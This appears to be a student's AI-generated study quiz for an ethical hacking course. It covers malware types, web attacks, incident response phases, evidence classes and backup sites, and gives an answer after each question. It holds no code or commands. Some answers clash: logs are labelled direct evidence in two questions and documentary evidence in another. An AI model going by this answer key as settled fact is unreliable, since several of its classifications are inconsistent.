Ethical Hacking - CSCI 4619-5619 final Study

Used AI to generate questions based on each module's learning objectives, concepts, and keywords

This type of malware disguises itself as a legitimate program but provides unauthorized access to a system.
A. Worm
B. Ransomware
C. Trojan Horse
D. Adware

Trojan Horse

What Linux distribution is popular among ethical hackers for its built in penetration testing tools?
A. Ubuntu
B. Kali Linux
C. Fedora
D. openSUSE

Kali Linux

An attacker injects code into a website that is later executed by users' browsers. What type of attack is this?
A. SQL Injection
B. Cross Site Scripting (XSS)
C. Denial of Service
D. Brute Force

Cross Site Scripting (XSS)

The process of overwhelming a system with requests to crash or degrade service is called what?
A. Spoofing
B. Social Engineering
C. DoS Attack
D. Port Scanning

DoS Attack

Which system is used to detect suspicious activity by analyzing network traffic, typically in real time?
A. IDS
B. SIEM
C. VPN
D. Proxy Server

IDS

This evidence-handling concept ensures that every person who touched the evidence is documented.
A. Rules of Evidence
B. Security Policy
C. Chain of Custody
D. Business Impact Analysis

Chain of Custody

Which platform allows virtual operating systems to run within another OS environment, useful for malware analysis?
A. Cold Site
B. Proxy Server
C. Virtual Machine
D. Load Balancer

Virtual Machine

Gaining access to a session token and impersonating a user is known as what?
A. Credential Stuffing
B. Phishing
C. Session Hijacking
D. SQL Injection

Session Highjacking

What type of site is prepped for use in a disaster but lacks live servers and data, requiring setup before use?
A. Warm Site
B. Hot Site
C. Cold Site
D. Live Site

Cold Site

This social engineering tactic involves convincing someone to give up information by pretending to be someone else over the phone.
A. Shoulder Surfing
B. Dumpster Diving
C. Pretext Calling
D. Reverse Engineering

Pretext Calling

What is the term for unauthorized scanning and enumeration of a database or web service?
A. Data Extraction
B. Web Crawling
C. Port Forwarding
D. Enumeration

Enumeration

Which type of software disabler aims to disable antivirus programs or firewalls to allow malware to operate undetected?
A. RAT
B. Security Software Disabler
C. Backdoor
D. Wrapper

Security Software Disabler

A malicious actor posts a fake login screen on a trusted site to collect credentials. This is an example of what?
A. Phishing
B. Spoofing
C. Packet Sniffing
D. Footprinting

Phishing

What is the name of the plan that ensures critical functions continue during and after a disaster?
A. Incident Response Plan
B. Business Continuity Plan
C. Network Access Plan
D. Penetration Test Report

Business Continuity Plan

This type of detection system runs on the host machine and monitors internal behaviors.
A. NIDS
B. Firewall
C. HIDS
D. VPN

HIDS

When a web application fails to validate input properly, what kind of vulnerability does this lead to?
A. Brute Force
B. Input Tampering
C. Input Validation Vulnerability
D. API Spoofing

Input Validation Vulnerability

A deceptive message that urges users to download malware under the guise of security alerts is known as what?
A. Scareware
B. Ransomware
C. Spyware
D. Adware

Scareware

What is the term for a location that has live servers, updated data, and is ready to take over operations immediately in case of failure?
A. Cold Site
B. Hot Site
C. Warm Site
D. Disaster Clone

Hot Site

Which file system is commonly associated with older Windows systems and is still recognized in Linux environments?
A. NTFS
B. EXT4
C. FAT
D. HFS+

FAT

What kind of evidence consists of logs or captured traffic that directly shows the events of an intrusion?
A. Hearsay
B. Documentary
C. Direct Evidence
D. Physical Evidence

Direct Evidence

Which of the following is an attack where an attacker takes over a legitimate user’s session to gain unauthorized access?
A. SQL Injection
B. Session Hijacking
C. Packet Sniffing
D. Social Engineering

Session Highjacking

A “hot site” is a backup location with power and equipment but no live data or services. True or False

False

Which type of malware encrypts user files and demands payment to restore access?
A. Worm
B. Adware
C. Ransomware
D. Logic Bomb

Ransomware

What kind of social engineering attack involves watching someone type their password over their shoulder?
A. Shoulder Surfing
B. Dumpster Diving
C. Phishing
D. Covert Channeling

Shoulder Surfing

Which Linux GUI is commonly associated with KDE environments?
A. GNOME
B. Cinnamon
C. Plasma Desktop
D. MATE

Plasma Desktop

A web server that allows directory listing, uses default credentials, and has outdated software is likely suffering from what?
A. SQL Injection
B. Hardening Error
C. Web Server Misconfiguration
D. Vulnerability Scanning

Web Server Misconfiguration

What type of plan focuses specifically on restoring IT systems and data after a disaster?
A. Incident Response Plan
B. Business Continuity Plan
C. Security Audit
D. Disaster Recovery Plan

Disaster Recovery Plan

A botnet is a group of infected machines controlled by an attacker to perform coordinated actions like DDoS attacks. True or False

True

What kind of malware may allow persistent access and hides itself deeply within the system’s processes and drivers?
A. Spyware
B. Rootkit
C. Scareware
D. RAT

Rootkit

Which evidence classification involves real, tangible objects like a USB drive or a device used in the crime?
A. Hearsay
B. Documentary
C. Physical Evidence
D. Direct Evidence

Physical Evidence

Which protocol is typically used to encrypt web communication between browsers and servers?
A. FTP
B. SSL/TLS
C. SMTP
D. DNS

SSL/TLS

GNOME and Plasma are both command line interfaces commonly used in Linux. True or False

False

What tool is commonly used to detect vulnerabilities in web servers and applications?
A. VirtualBox
B. Nessus
C. Hydra
D. SQLRECON

Nessus

What kind of malware disguises itself as legitimate software to trick users into installing it?
A. Trojan Horse
B. Worm
C. Ransomware
D. Keylogger

Trojan Horse

Which phase of incident response involves figuring out how the attacker got in and what needs to be fixed?
A. Preparation
B. Containment
C. Eradication
D. Recovery

Eradication

This term refers to the legal and procedural process for protecting and managing digital evidence.
A. Chain of Custody
B. Due Diligence
C. Digital Rights Management
D. Cold Site

Chain of Custody

Which of the following is NOT a benefit of using Linux Live CDs?
A. Portability
B. No installation needed
C. Permanent storage of changes
D. Useful for forensic tasks

Permanent storage of changes

What type of detection system sits on the network perimeter and watches all inbound/outbound traffic?
A. HIDS
B. VPN
C. Proxy Server
D. NIDS

NIDS

A social engineering scam where the attacker builds trust with the victim before manipulating them is known as what?
A. Reverse Social Engineering
B. Baiting
C. Pretexting
D. Phishing

Pretexting

What’s the term for a planned test or simulated event used to validate an incident response or disaster recovery plan?
A. Live Fire
B. Red Teaming
C. Structured Walkthrough
D. Port Scan

Structured Walkthrough

What kind of attack involves injecting malicious code into a backend database through web forms or URL parameters?
A. Cross Site Scripting (XSS)
B. Session Hijacking
C. SQL Injection
D. Buffer Overflow

SQL Injection

A cold site is the most expensive and time critical option for disaster recovery.

True or False:

False

Which of the following allows attackers to redirect a URL to malicious content or steal credentials via a poisoned query string?
A. Input fuzzing
B. Port spoofing
C. URL poisoning
D. DNS tunneling

URL poisoning

What category of malicious software includes keystroke loggers, screen capture tools, and password stealers?
A. Adware
B. Spyware
C. Ransomware
D. Worms

Spyware

True or False: Enumeration is typically used during the reconnaissance phase to gather usernames, shares, and network services.

True

Which Linux distribution was developed specifically for digital forensics and penetration testing?
A. Ubuntu
B. Kali Linux
C. Fedora
D. Red Hat Enterprise

Kali Linux

Which evidence classification applies to log files and screenshots that directly show the events of an attack?
A. Physical Evidence
B. Documentary Evidence
C. Direct Evidence
D. Testimonial Evidence

Direct Evidence

This web vulnerability allows attackers to run malicious scripts in the victim's browser, often used to steal session cookies.
A. SQL Injection
B. DoS
C. Cross Site Scripting (XSS)
D. Phishing

Cross Site Scripting (XSS)

A disaster recovery plan focuses on ensuring business operations continue without interruption during a crisis. True or False

False

Which of the following best describes a "logic bomb"?
A. Code that replicates and spreads automatically
B. Code that activates under specific conditions
C. A trojan that opens a backdoor
D. A worm that infects email attachments

Code that activates under specific conditions

What common security control allows, or blocks traffic based on defined rules, typically deployed at network boundaries?
A. Firewall
B. SIEM
C. Proxy Server
D. Load Balancer

Firewall

Which malware attack disguises itself as a real file but contains hidden code to create a backdoor into a system?
A. Rootkit
B. Trojan Horse
C. RAT
D. Adware

Trojan Horse

The Plasma desktop is part of the GNOME project. True or False

False

What is the most appropriate response when malware is detected on a system and needs to be removed?
A. Report it and take no further action
B. Disconnect, isolate, and remediate
C. Immediately reboot the system
D. Upgrade the firewall rules

Disconnect, isolate, and remediate

This malware type operates without user knowledge and may redirect browsing, install other programs, or record activity.
A. RAT
B. Spyware
C. Backdoor
D. Exploit Kit

Spyware

Which incident response phase involves identifying how the breach occurred and removing any malware or unauthorized access?
A. Containment
B. Eradication
C. Recovery
D. Identification

Eradication

Which component of Linux acts as the core interface between applications and hardware?
A. GUI
B. Shell
C. Kernel
D. Daemon

Kernel

Social engineering attacks rely primarily on software flaws and technical exploits.
True or False

False

What’s a common goal of input validation during web development?
A. Improve page loading speed
B. Allow flexible code execution
C. Prevent injection attacks
D. Help search engines crawl better

Prevent injection attacks

Which of the following threats is most associated with cloud computing environments?
A. Keylogging
B. Ransomware
C. Multi-tenancy risks
D. Boot sector corruption

Multi-tenancy risks

Which term refers to unauthorized access to a network by leveraging weak authentication mechanisms or guessing login credentials?
A. Brute Force Attack
B. Cross-Site Request Forgery
C. Port Scanning
D. SQL Injection

Brute Force Attack

A warm site includes updated hardware, software, and real time mirrored data for immediate failover. True or False

False

Which of the following is a key benefit of using a virtual machine in penetration testing?
A. Increased physical security
B. Greater RAM capacity
C. Easy snapshot rollback
D. Hardware level keylogging protection

Easy snapshot rollback

What security concept ensures that multiple layers of protection are in place, such as firewalls, IDS/IPS, and endpoint controls?
A. Least Privilege
B. Defense in Depth
C. Privilege Escalation
D. Security through Obscurity

Defense in Depth

This type of attack involves sending massive ICMP echo request packets to a target in order to overwhelm its resources.
A. DNS Spoofing
B. Smurf Attack
C. SYN Flood
D. Poison Null Byte Attack

Smurf Attack

Which type of malware allows remote control of a victim’s machine and is often used in botnet attacks?
A. RAT (Remote Access Trojan)
B. Logic Bomb
C. Worm
D. Polymorphic Virus

RAT (Remote Access Trojan)

A “zero day” vulnerability refers to a publicly disclosed exploit that already has a patch available. True or False

False

What kind of evidence is derived from personal observation or direct testimony of a witness?
A. Testimonial Evidence
B. Hearsay
C. Direct Evidence
D. Documentary Evidence

Testimonial Evidence

Which incident response phase is concerned with limiting the spread and impact of an active security incident?
A. Containment
B. Recovery
C. Eradication
D. Detection

Containment

What’s the main purpose of a “honeypot” in a network security environment?
A. Block traffic from malicious IPs
B. Encrypt traffic before it leaves the LAN
C. Attract and trap attackers for analysis
D. Improve data throughput

Attract and trap attackers for analysis

What does HIPAA primarily regulate?
A. Financial records
B. Social media content
C. Protected health information
D. Password encryption practices

Protected health information

A logic bomb spreads automatically to other machines on the network like a worm.
True or False

False

Which of the following tools is used for database scanning and assessment?
A. Scuba
B. Hydra
C. Nessus
D. Metasploit

Scuba

What method is used by attackers to trick users into believing they’re interacting with a trusted site, when they are not?
A. Phishing
B. Keylogging
C. URL Filtering
D. Enumeration

Phishing

Which web vulnerability takes advantage of input fields that aren’t properly sanitized, allowing attackers to run unauthorized queries?
A. Cross Site Request Forgery
B. SQL Injection
C. XSS
D. Enumeration

SQL Injection

Which security standard is specifically focused on protecting cardholder data for organizations that handle credit card payments?
A. HIPAA
B. NIST 800 53
C. PCI DSS
D. GLBA

PCI DSS

In a structured walkthrough, the response team simulates a real incident to test their plans and procedures. True or False

False

What is a common symptom of a denial of service (DoS) attack?
A. Excessive CPU usage
B. System patch failure
C. Users receiving spam email
D. Sudden password changes

Excessive CPU usage

What does the acronym “IaaS” stand for in cloud computing?
A. Internet as a Service
B. Interface and Application Services
C. Infrastructure as a Service
D. Internal Authentication and Security

Infrastructure as a Service

What kind of network attack targets services by overwhelming them with traffic from multiple sources simultaneously?
A. Brute Force Attack
B. DDoS
C. Logic Bomb
D. Port Knocking

DDoS

What term describes a security policy where all access is denied unless explicitly allowed?
A. Open Policy
B. Least Privilege
C. Implicit Deny
D. Zero Trust

Implicit Deny

“Dumpster diving” is a form of technical reconnaissance used to exploit software vulnerabilities. True or False

False

Which plan is used to guide actions and communication during a cyberattack or system compromise?
A. Risk Assessment Plan
B. Incident Response Plan
C. Disaster Recovery Plan
D. Penetration Testing Agreement

Incident Response Plan

What kind of evidence is gathered from data sources like system logs, network captures, and audit trails?
A. Testimonial Evidence
B. Physical Evidence
C. Documentary Evidence
D. Analog Evidence

Documentary Evidence

What type of backup site is partially configured and can become fully operational with limited setup time?
A. Cold Site
B. Warm Site
C. Hot Site
D. Shadow Site

Warm Site

Which type of malware spreads itself across a network without any user interaction?
A. Trojan Horse
B. Ransomware
C. Worm
D. RAT

Worm

What is the term for using deception or impersonation to gain sensitive information from people?
A. Malware
B. Social Engineering
C. Credential Stuffing
D. Port Scanning

Social Engineering

A port redirection attack sends incoming network traffic to a different port than originally intended. True or False

True

Which of the following would be considered a benefit of using a Live CD during forensics or incident response?
A. Allows permanent OS changes
B. Prevents contamination of host system
C. Requires less CPU power
D. Automatically patches vulnerabilities

Prevents contamination of host system

Which Linux distro is known for its stability and popularity in enterprise server environments?
A. Arch Linux
B. Red Hat Enterprise Linux
C. Manjaro
D. Kali Linux

Red Hat Enterprise Linux

This security tool intercepts and inspects HTTP traffic between a browser and the web server.
A. Metasploit
B. Burp Suite
C. Scuba
D. Nessus

Burp Suite

A worm is a type of malware that hides itself inside another legitimate file or application. True or False

False

Which concept involves restricting users to only the data or systems needed to perform their job?
A. Role-Based Execution
B. Least Privilege
C. Defense in Depth
D. Implicit Deny

Least Privilege

Which kind of social engineering attack uses fake alerts to frighten users into downloading malware?
A. Spear Phishing
B. Smishing
C. Scareware
D. Pretexting

Scareware

Which of the following is not typically a function of an Intrusion Detection System (IDS)?
A. Alerting on suspicious activity
B. Logging potential threats
C. Automatically blocking malicious traffic
D. Monitoring network packets

Automatically blocking malicious traffic

What database attack targets improperly filtered characters to exploit backend query logic?
A. XSS
B. SQL Injection
C. URL Spoofing
D. DDoS

SQL Injection

A “hot site” is ready to go immediately, with up-to-date data and minimal setup required.

True or False

True

What is the purpose of the “eradication” phase in incident response?
A. Reporting incident to stakeholders
B. Testing for vulnerabilities
C. Removing malware and closing exploited vulnerabilities
D. Creating new policies

Removing malware and closing exploited vulnerabilities

What is the first phase of a formal incident response plan?
A. Detection
B. Identification
C. Preparation
D. Containment

Preparation

A device or software that acts as an intermediary for requests from clients seeking resources from other servers is known as a:
A. Proxy Server
B. IDS
C. Firewall
D. Honeypot

Proxy Server